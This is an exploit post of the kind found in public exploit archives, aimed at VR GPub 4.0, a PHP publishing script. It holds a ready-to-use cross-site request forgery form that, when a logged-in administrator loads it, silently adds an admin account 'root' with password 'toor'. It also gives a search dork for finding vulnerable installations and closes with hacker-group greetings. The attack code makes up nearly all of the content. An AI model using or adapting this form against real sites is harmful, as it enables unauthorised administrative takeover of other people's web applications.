+-------------------------------------------------------------------------+ # Exploit Title : VR GPub 4.0 CSRF Vulnerability # version : VR GPub 4.0 # Author : Cyber-Crystal # Date : n/a # Dork : inurl:"VR GPub" # Software Link : http://www.easy-script.com/scripts-PHP/vr-gpub-3907.html +-------------------------------------------------------------------------+ +---+[CSRF Add Admin Acuonnt by Cyber-Crystal]+---+ <html> <title>[#] Exploit [#]</title> <body> <form method="post" action="http://localhost/vrgpub/admin/admin_options.php"> <input name="ae_login" type="text" id="ae_login" size="20" maxlength="30" value="root" /> <input name="ae_mdp" type="password" id="ae_mdp" size="20" maxlength="30" value="toor" /> <input name="ae_mdp2" type="password" id="ae_mdp2" size="20" maxlength="30" value="toor" /> <p align="center"> <input type="submit" name="Submit4" value="Add" /> </p> </form> </body> </html> #-----------------------------------# | by Cyber-Crystal | | | | Mail : Cyb3r.Crystal@Gmail.com | | Home // www.v4-team.com/cc | | | #-----------------------------------# Greetz 2 : Secure-x41 | Fox Hacker | Or4nG.M4n | SadHacker | Mr.Black | Red Virus | aBu.HaLiL501 | T7 | Sniper_IRaq || # All Man 0_0 # the End